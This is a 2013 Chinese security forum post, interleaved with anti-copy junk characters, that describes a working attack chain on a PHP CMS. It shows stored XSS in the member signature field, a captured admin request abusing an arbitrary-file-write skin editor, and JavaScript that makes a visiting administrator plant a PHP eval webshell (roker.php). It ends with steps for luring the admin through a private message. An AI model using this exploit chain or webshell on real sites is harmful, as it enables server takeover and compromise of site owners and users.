|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
) w; n% o) ^& m& _( z官网已经修补了,所以重新下了源码: `- D! h s/ `) V! d8 ^: j. r
因为 后台登入 还需要认证码 所以 注入就没看了。
]4 ?& l7 h7 U7 q" _% c/ S存在 xss" D$ }& W' R) [1 r: p1 F& i. a
漏洞文件 user/member/skin_edit.php8 @0 P/ |0 `* Z- T9 S* N
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:( ?7 I* x, t$ c Y1 E" t$ ^7 k
) h0 b) ^( K! m8 Z6 q</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>4 M4 D7 s u' L3 u4 Q9 {) e
7 I! e/ d9 U. q$ @
</textarea></td></tr>
* d3 \1 R2 G. E: D. g9 c ' ~2 t/ ?; y! L
user/do.php
* c: v7 B$ G/ \& v- G% Z: n/ r j
$ A1 K6 B) f2 ~) Q" Z& Q9 A' L1 p- p
if($op=='zl'){ //资料
* N$ X3 u5 U8 ?+ t# T9 u
& c3 v+ }0 i/ S3 H if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
0 m* X/ ]) b+ F9 j+ I exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
; M# [0 ^/ x2 j% T , j8 T; Q1 R. b7 o
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',
$ Q) _, A1 {8 k$ A- ?7 D+ r1 ?
7 h2 @: S- j1 r( X$ p2 b: O5 d CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'. ]1 k4 E0 ]: c, c; k6 s+ X) A
where CS_Name='".$cscms_name."'";' P# i) Q; P" k* F: M1 ?
# S ?- B3 s, m8 ^ k: B if($db->query($sql)){
9 x/ O8 S% s9 y & U9 O* q: r0 O; a# v
exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));9 B5 e3 P9 z3 f6 x6 a4 V0 n8 a B
/ B: Y+ C f" X' D2 U, h/ s. B }else{
% s/ @& V1 x3 ? r( I) ]" c( {# d 9 k9 N( U; d" B4 q! W- ^
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));1 j, n7 I/ Q4 W: V7 N
! p3 x9 n3 p' i/ J% Y8 U8 Q }; P( j3 T Y) n) X8 l* t7 f# g
! n# O' H, |, u4 k3 a& k) @* E6 }& |6 `, |6 \
没有 过滤导致xss产生。9 H5 {9 |/ q1 l j) M
后台 看了下 很奇葩的是可以写任意格式文件。。
7 j( R2 s V$ [: b) O抓包。。! B/ @2 Y! f" g6 ^4 t5 X8 D0 a
5 x4 P% ~# C- b0 [( k6 o8 m' B! q9 h( N( u3 a( n [# ]# {" h
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
1 [4 d2 U7 u" {7 U5 i. C # E1 V* U* u/ A8 X
Accept: text/html, application/xhtml+xml, */*
2 \+ D! i4 T# p P+ @4 e' |' G) ~$ J h0 N
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php* o2 z R8 j8 O
" @3 a# K5 e* B; k
Accept-Language: zh-CN3 [$ r# I% B2 p0 L( P# A
# t s4 y; q; A- w& F7 q& n2 t$ N* HUser-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
0 Y( `0 S3 e i t
+ e# M. W# w1 Y( q \# p# KContent-Type: application/x-www-form-urlencoded! k+ x7 g7 H1 _8 s' L
& K! k* f* s. h6 Q4 _: r" wAccept-Encoding: gzip, deflate9 |1 `: y3 W6 C2 h h" L
: b! Z H, c t3 Z6 B
Host: 127.0.0.1% `8 ?- h" u( ] ]* u/ `" n
/ k6 p+ r# A% X P: B
Content-Length: 38
1 i' B# ^3 Q" x/ n% Z# O
T$ J+ q% }$ T, _4 N; U7 BDNT: 1
8 h/ k+ k ^) P- b+ p0 K
1 b2 U% s+ p* ~: AConnection: Keep-Alive
: g& [' J; W1 O- c / `3 R5 A: C2 J5 ]* H$ G( z! A5 w' H
Cache-Control: no-cache1 B/ U7 N/ T2 s m
8 s7 L6 j$ j# U. ?
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
/ G9 n [$ [0 V" C7 u& K9 ` 0 h: @3 G6 X! _/ g- d7 v/ i
3 @6 N2 b" M; l) h6 @& ^
name=aaa.php&content=%3Cs%3E%3Ca%25%3E
3 z) ?% p* F8 A5 B: P- V: I) v
; G% N& Q* w. P( s; O& q6 u
8 F8 G4 T ~$ y; \
! I5 T w n6 W" K于是 构造js如下。% P1 |' x4 V# r6 Z# C
" U _' F" c% s# L) U A本帖隐藏的内容<script>
, h2 G- z# |& S. o: J% A+ NthisTHost = top.location.hostname;" @0 d9 [, ~) m( a: M3 ?( M$ w
& o- Q. m1 v9 d- C \thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
# m& I% L9 a" i3 {
5 y3 ^2 t- R9 O2 t& tfunction PostSubmit(url, data, msg) { : ~) B, B8 g; d' a: b- z1 k/ {
var postUrl = url;4 j9 u( I$ ^+ m4 i3 V; K
2 p9 j6 Q( |' J# o/ a+ r8 K var postData = data; 2 _. n! Q3 s9 v
var msgData = msg; 2 Y- q3 I5 N1 ]7 T7 s! ^( i) i
var ExportForm = document.createElement("FORM"); % X7 K8 M* Q: i% f" f( x! ]! _
document.body.appendChild(ExportForm); 6 O, n7 ]2 |9 \ F0 |- ^
ExportForm.method = "POST";
) U& w+ F: R$ W7 w. F& g var newElement = document.createElement("input"); 5 D2 f5 o9 e, \' ]8 \& L' M
newElement.setAttribute("name", "name");
* B- I) L! o' Y( Q* N' D newElement.setAttribute("type", "hidden");
4 M. M7 `" I( |+ v/ H& e/ ^ var newElement2 = document.createElement("input"); ! j! ]# t8 n7 _, U# Z- G+ p" p/ l
newElement2.setAttribute("name", "content");
) [: f* W* x/ A0 p" J% D6 s newElement2.setAttribute("type", "hidden");
2 q ^3 n3 n: a1 t, M8 i ExportForm.appendChild(newElement);
9 d% H$ L' ~# u6 Z ExportForm.appendChild(newElement2);
8 E3 C8 w' i& J% r2 A newElement.value = postData; ' v3 q; |8 l D+ e9 b' d! C7 r/ w
newElement2.value = msgData; 9 f; e3 r. _5 s7 t
ExportForm.action = postUrl; 1 ]) V$ ^% I0 g' G3 s( w
ExportForm.submit(); 4 v. y9 _5 }! f. _. N
};
% F. D' h7 s" k0 k, w# E, P
% b. f3 y( v% ~1 s# z- p W1 x* jPostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");# ~: G" |. C$ y/ b
' p. G7 d3 o- r</script>9 J) O! g$ b1 D' m/ ^
1 F% p, U( G! K+ |" T/ a
, C0 u( p8 v: O- X K/ F: L( {% |, v' Y3 g2 N5 G, v0 Z# Y
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入
3 f" G* O0 `7 o$ Y. y用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)6 `+ g! e" C1 U" ^ W; g
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
/ ?* }3 u+ [8 N! B3 G
|
|
发表于 2013-11-6 18:09:37
收藏
支持
反对